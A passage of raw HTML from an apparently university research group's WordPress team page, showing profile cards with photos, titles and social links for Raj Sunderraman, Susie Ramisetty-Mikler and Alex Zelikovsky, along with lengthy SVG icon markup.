0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-sunderraman1-e1697143080973.jpeg\" class=\"wp-image-1668 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697143162762.png\" class=\"wp-image-1670 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-zelikovsky-e1697143252884-1.jpeg\" class=\"wp-image-1673 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                